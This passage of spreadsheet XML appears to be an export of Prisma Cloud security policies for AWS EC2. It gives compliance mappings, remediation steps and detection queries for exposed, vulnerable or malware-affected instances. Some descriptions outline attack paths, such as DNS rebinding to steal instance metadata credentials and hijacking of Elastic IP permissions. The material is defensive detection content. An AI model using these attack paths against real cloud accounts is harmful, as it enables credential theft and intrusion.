          <t>MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, APRA (CPS 234) Information Security, PCI DSS v4.0, ISO 27002:2022, MLPS 2.0 (Level 3), Matt's ATT&amp;ACK, FFIEC, PCI DSS v4.0, Demo_Daryl ACSC Information Security Manual (ISM), ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, FFIEC, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, CIS v1.5.0 (AWS) - Level 2, CSA CCM v4.0.12, NIST CSF, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, FFIEC, Copy of CIS Controls v8, ISO 27002:2022, CIS Controls v8.1, MLPS 2.0, CSA CCM v.4.0.6, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, CSA CCM v4.0.12, ISO/IEC 27002:2013, NIST SP 800-172, CHC HITRUST CSF v.9.6.0, PCI DSS v4.0, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, MTSBv2_AWS, CyberSecurity Law of the People's Republic of China, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, PCI DSS v4.0, Risk Management in Technology (RMiT), CyberSecurity Law of the People's Republic of China, CIS v3.0.0 (AWS) Level 2, CIS Controls v7.1, MLPS 2.0 (Level 2), CIS v1.2.0 (AWS), ISO/IEC 27002:2013, CRI Profile v1.2.1, CyberSecurity Law of the People's Republic of China, MITRE ATT&amp;CK v10.0 [Deprecated], PCI DSS v4.0, ISO/IEC 27017:2015, CSA CCM v.4.0.1, Australian Cyber Security Centre (ACSC) Essential Eight, CIS v1.3.0 (AWS), Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, FFIEC, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, CSA CCM v4.0.12, HITRUST v.9.4.2 [Deprecated], CIS v1.4.0 (AWS), ISO/IEC 27001:2022, ISO/IEC 27001:2022, ISO 27002:2022, ISO/IEC 27018:2019, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, CSA CCM v4.0.12, CIS Controls v8, CIS Controls v8.1, CCPA 2018, PIPEDA, CRI Profile v2.0, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Australian Energy Sector Cyber Security Framework (AESCSF), PCI DSS v3.2.1, CIS v2.0.0 (AWS) - Level 2, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1805" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1805" s="2" t="inlineStr"/>
      <c r="D1805" t="n">
        <v>0</v>
      </c>
      <c r="E1805" t="n">
        <v>0</v>
      </c>
      <c r="F1805" t="n">
        <v>3</v>
      </c>
      <c r="G1805" t="b">
        <v>1</v>
      </c>
      <c r="H18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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1805" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1805" t="inlineStr">
        <is>
          <t>AWS EC2 Instance IAM Role not enabled</t>
        </is>
      </c>
      <c r="L1805" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1805" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1805" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1805" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1805" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1805" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1805" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1805" t="inlineStr"/>
      <c r="T1805" t="b">
        <v>0</v>
      </c>
      <c r="U1805" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1805" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1805" t="inlineStr">
        <is>
          <t>AWS provides Identity Access Management (IAM) roles to securely access AWS services and resources. The role is an identity with permission policies that define what the identity can and cannot do in AWS. As a best practice, create IAM roles and attach the role to manage EC2 instance permissions securely instead of distributing or sharing keys or passwords.</t>
        </is>
      </c>
      <c r="X1805" t="inlineStr">
        <is>
          <t>The most common setup is the AWS default that allows for EC2 access to AWS Services. For most, this is a great way to realize flexible, yet secure, EC2 access enabled for your instances. Select this when you launch EC2 instances to automatically inherit these permissions.
IAM
1. Go to the AWS console IAM dashboard.
2. In the navigation pane, choose Roles, Create new role.
3. Under 'Choose the service that will use this role' select EC2, then 'Next:Permissions.'
4. On the Attach permissions policies page, select an AWS managed policy that grants your instance access to the resources that they need, then 'Next:Tags.'
5. Add tags (optional), the select 'Next:Review.'
6. On the Create role and Review page, type a name for the role and choose Create role.
EC2
1. Go to the AWS console EC2 dashboard.
2. Select Running Instances.
3. Check the instance you want to modify.
4. From the Actions pull down menu, select Instance Settings and Attach/Replace IAM Role.
5. On the Attach/Replace IAM Role page, under the IAM role pull down menu, choose the role created in the IAM steps above. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-an-iam-role-is-attached-to-ec2-instance
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-an-iam-role-is-attached-to-ec2-instance</t>
        </is>
      </c>
      <c r="Y1805" t="inlineStr"/>
      <c r="Z1805" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-instances' AND json.rule =  iamInstanceProfile.arn does not exist and state.code equals 16
{"category":"IAM","resourceTypes":["aws_instance"]}</t>
        </is>
      </c>
      <c r="AA1805" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1805" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1805" t="inlineStr">
        <is>
          <t>PC-AWS-EC2-269-CKV2_AWS_41</t>
        </is>
      </c>
      <c r="AD1805" t="b">
        <v>1</v>
      </c>
      <c r="AE1805" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1805" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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5" t="inlineStr">
        <is>
          <t>8f2a2ff7-b484-463d-95df-aecd038f62b0</t>
        </is>
      </c>
      <c r="AI1805" t="inlineStr">
        <is>
          <t>2f6f7f84-d2c1-4393-b7eb-e61df34e2700</t>
        </is>
      </c>
      <c r="AJ1805" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1805" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1806">
      <c r="A1806" t="inlineStr"/>
      <c r="B1806" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1806" s="2" t="inlineStr"/>
      <c r="D1806" t="inlineStr"/>
      <c r="E1806" t="inlineStr"/>
      <c r="F1806" t="inlineStr"/>
      <c r="G1806" t="b">
        <v>1</v>
      </c>
      <c r="H18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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1806" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1806" t="inlineStr">
        <is>
          <t>Privilege Escalation risk due to publicly exposed and vulnerable AWS EC2 instance [OpenSSL, CVE-2022-3786]</t>
        </is>
      </c>
      <c r="L1806" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1806" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1806" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1806" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1806" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1806" t="inlineStr"/>
      <c r="R1806" t="inlineStr"/>
      <c r="S1806" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1806" t="b">
        <v>0</v>
      </c>
      <c r="U1806" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1806" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1806" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-3786].
Privilege escalation vulnerability is a security flaw allowing a user to gain unauthorized elevated system access. Exploiting this vulnerability compromises system security, enabling unauthorized data access or manipulation. The fact that the EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the OpenSSL [CVE-2022-3786] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X180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CVE-2022-3786
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-3786</t>
        </is>
      </c>
      <c r="Y1806" t="inlineStr"/>
      <c r="Z1806" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-3786'))</t>
        </is>
      </c>
      <c r="AA1806" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1806" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1806" t="inlineStr"/>
      <c r="AD1806" t="b">
        <v>1</v>
      </c>
      <c r="AE1806" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1806" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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6" t="inlineStr">
        <is>
          <t>bac8c4d4-a40b-404f-9931-e3cfc000529f</t>
        </is>
      </c>
      <c r="AI1806" t="inlineStr">
        <is>
          <t>07c50726-1c9e-4b89-b139-42a983cce164</t>
        </is>
      </c>
      <c r="AJ1806" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1806" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1807">
      <c r="A1807" t="inlineStr"/>
      <c r="B1807" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1807" s="2" t="inlineStr"/>
      <c r="D1807" t="n">
        <v>131</v>
      </c>
      <c r="E1807" t="n">
        <v>9</v>
      </c>
      <c r="F1807" t="n">
        <v>52</v>
      </c>
      <c r="G1807" t="b">
        <v>1</v>
      </c>
      <c r="H18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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1807" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1807" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to a publicly exposed and vulnerable AWS EC2 instance</t>
        </is>
      </c>
      <c r="L1807" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1807" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1807" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1807" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1807" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1807" t="inlineStr"/>
      <c r="R1807" t="inlineStr"/>
      <c r="S1807" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1807" t="b">
        <v>0</v>
      </c>
      <c r="U1807" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1807" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1807" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed and have critical or high vulnerabilities.
Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected EC2 instance, enabling them to perform malicious actions. The public exposure of these vulnerable EC2 instances makes them an easy target for attacks.
Immediate attention is required to remediate the critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1807"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07" t="inlineStr"/>
      <c r="Z1807" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and with : (Vuln WHERE severity greater than or equal to high) and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)')</t>
        </is>
      </c>
      <c r="AA1807" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1807" t="inlineStr">
        <is>
          <t>2024-03-20 06:34:26</t>
        </is>
      </c>
      <c r="AC1807" t="inlineStr"/>
      <c r="AD1807" t="b">
        <v>1</v>
      </c>
      <c r="AE1807" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1807" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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7" t="inlineStr">
        <is>
          <t>999172bf-3a25-490c-8983-fbd27e287354</t>
        </is>
      </c>
      <c r="AI1807" t="inlineStr">
        <is>
          <t>80c711f5-094a-44f0-aa79-38e01eeba956</t>
        </is>
      </c>
      <c r="AJ1807" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1807" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1808">
      <c r="A1808" t="inlineStr"/>
      <c r="B1808" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1808" s="2" t="inlineStr"/>
      <c r="D1808" t="inlineStr"/>
      <c r="E1808" t="inlineStr"/>
      <c r="F1808" t="inlineStr"/>
      <c r="G1808" t="b">
        <v>1</v>
      </c>
      <c r="H18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08" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1808" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1808" t="inlineStr">
        <is>
          <t>Potentially unauthorized DNS rebinding activity detected on a publicly exposed and vulnerable AWS EC2 instance</t>
        </is>
      </c>
      <c r="L1808" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1808" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1808" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1808" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1808" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1808" t="inlineStr"/>
      <c r="R1808" t="inlineStr"/>
      <c r="S1808" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1808" t="b">
        <v>0</v>
      </c>
      <c r="U1808" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1808" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1808" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and detected with DNS rebinding activity.
Attackers can exploit vulnerabilities on the affected EC2 instance to compromise their confidentiality, integrity, and availability, allowing them to perform malicious actions. Accessing the attacker's Rebinding Web Server allows the attacker to use the instance as a proxy to access inaccessible internal resources, such as the AWS Metadata Service, potentially enabling the theft of EC2 temporary AWS credentials.
Immediate attention is required to investigate DNS rebinding activity, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 Instance as soon as possible.</t>
        </is>
      </c>
      <c r="X180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Protect internal services by only allowing HTTPS connections.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Avoid assigning a domain name to the AWS metadata service.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08" t="inlineStr"/>
      <c r="Z1808" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','DNS Rebinding Activity') AND with : ( Vuln WHERE severity greater than or equal to high )</t>
        </is>
      </c>
      <c r="AA1808" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1808" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:45</t>
        </is>
      </c>
      <c r="AC1808" t="inlineStr"/>
      <c r="AD1808" t="b">
        <v>1</v>
      </c>
      <c r="AE1808" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1808" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG18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08" t="inlineStr">
        <is>
          <t>1e5707ad-6b83-49e4-8b07-cdece48532a5</t>
        </is>
      </c>
      <c r="AI1808" t="inlineStr">
        <is>
          <t>c3573380-85ae-46ca-8db8-38055908c1be</t>
        </is>
      </c>
      <c r="AJ1808" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1808" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1809">
      <c r="A1809" t="inlineStr"/>
      <c r="B1809" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1809" s="2" t="inlineStr"/>
      <c r="D1809" t="inlineStr"/>
      <c r="E1809" t="inlineStr"/>
      <c r="F1809" t="inlineStr"/>
      <c r="G1809" t="b">
        <v>1</v>
      </c>
      <c r="H18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09" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1809" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1809" t="inlineStr">
        <is>
          <t>Potential malicious activity on AWS EC2 instance affected by malware</t>
        </is>
      </c>
      <c r="L1809" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,MALWARE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1809" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1809" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1809" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1809" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1809" t="inlineStr"/>
      <c r="R1809" t="inlineStr"/>
      <c r="S1809" t="inlineStr">
        <is>
          <t>attackpath,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1809" t="b">
        <v>0</v>
      </c>
      <c r="U1809" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1809" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1809" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are affected by malware and are connected with remote systems known for malware activities.
Malware activity includes activity from viruses, trojans, worms, ransomware, botnet, spambot and other types of malware. If network connectivity with remote systems known for malware activity is observed on an EC2 instance, it could indicate that the instance is already has been compromised and the malware is currently in operation.
Immediate attention is required to remediate the malware reported for the instances as soon as possible and investigate suspicious network activities.</t>
        </is>
      </c>
      <c r="X1809"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1809" t="inlineStr"/>
      <c r="Z1809" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('Host contains Malware' or 'Host contains Grayware')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t>
        </is>
      </c>
      <c r="AA1809" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1809" t="inlineStr">
        <is>
          <t>2024-03-22 19:07:30</t>
        </is>
      </c>
      <c r="AC1809" t="inlineStr"/>
      <c r="AD1809" t="b">
        <v>1</v>
      </c>
      <c r="AE1809" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1809" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG18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09" t="inlineStr">
        <is>
          <t>1ef8e09e-29b9-474c-91e0-267a3ef2ca91</t>
        </is>
      </c>
      <c r="AI1809" t="inlineStr">
        <is>
          <t>7dc70c93-6c2d-4e8e-b1c0-0d5b1fb5a362</t>
        </is>
      </c>
      <c r="AJ1809" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1809" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1810">
      <c r="A1810" t="inlineStr"/>
      <c r="B1810" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1810" s="2" t="inlineStr"/>
      <c r="D1810" t="inlineStr"/>
      <c r="E1810" t="inlineStr"/>
      <c r="F1810" t="inlineStr"/>
      <c r="G1810" t="b">
        <v>1</v>
      </c>
      <c r="H18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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1810" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1810" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance (Apache APISIX, CVE-2022-24112)</t>
        </is>
      </c>
      <c r="L1810" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1810" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1810" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1810" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1810" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1810" t="inlineStr"/>
      <c r="R1810" t="inlineStr"/>
      <c r="S1810" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1810" t="b">
        <v>0</v>
      </c>
      <c r="U1810" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1810" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1810" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2022-24112).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APISIX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APISIX (CVE-2022-24112) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X1810"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CVE-2022-24112
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-24112</t>
        </is>
      </c>
      <c r="Y1810" t="inlineStr"/>
      <c r="Z1810" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-24112'))</t>
        </is>
      </c>
      <c r="AA1810" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1810" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:08</t>
        </is>
      </c>
      <c r="AC1810" t="inlineStr"/>
      <c r="AD1810" t="b">
        <v>1</v>
      </c>
      <c r="AE1810" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1810" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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0" t="inlineStr">
        <is>
          <t>8e9d7475-84dd-4517-ac3a-36b562e1abc7</t>
        </is>
      </c>
      <c r="AI1810" t="inlineStr">
        <is>
          <t>92658223-65d2-4344-870b-7d2132bed094</t>
        </is>
      </c>
      <c r="AJ1810" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1810" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1811">
      <c r="A1811" t="inlineStr"/>
      <c r="B1811" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1811" s="2" t="inlineStr"/>
      <c r="D1811" t="n">
        <v>6</v>
      </c>
      <c r="E1811" t="n">
        <v>0</v>
      </c>
      <c r="F1811" t="n">
        <v>0</v>
      </c>
      <c r="G1811" t="b">
        <v>1</v>
      </c>
      <c r="H18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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1811" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1811" t="inlineStr">
        <is>
          <t>IP Hijacking risk due to a publicly exposed and vulnerable EC2 instance with risky Elastic IP Hijacking permissions</t>
        </is>
      </c>
      <c r="L1811" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1811" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1811" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1811" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1811" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1811" t="inlineStr"/>
      <c r="R1811" t="inlineStr"/>
      <c r="S1811" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1811" t="b">
        <v>0</v>
      </c>
      <c r="U1811" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1811" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1811" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and have Elastic IP Hijacking permissions.
A publicly exposed and vulnerable AWS EC2 instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. EC2 instance with Elastic IP Hijacking permissions could further expand the surface of the attack and grant malicious actors to misuse the IP.
This policy checks for the following risky database management write access permissions:
'ec2:DisassociateAddress', 'ec2:EnableAddressTransfer'
Immediate attention is required to grant the least privileges required and remove unwanted risky permissions assigned to the EC2 instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1811"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11" t="inlineStr"/>
      <c r="Z1811" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 IAM role with Elastic IP Hijacking permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1811" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1811" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1811" t="inlineStr"/>
      <c r="AD1811" t="b">
        <v>1</v>
      </c>
      <c r="AE1811" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1811" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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1" t="inlineStr">
        <is>
          <t>5ecb2b27-1288-4a74-ba05-e672e9d8af3f</t>
        </is>
      </c>
      <c r="AI1811" t="inlineStr">
        <is>
          <t>f402b374-c82a-4592-abe9-69115f123dee</t>
        </is>
      </c>
      <c r="AJ1811" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1811" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1812">
      <c r="A1812" t="inlineStr"/>
      <c r="B1812" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1812" s="2" t="inlineStr"/>
      <c r="D1812" t="inlineStr"/>
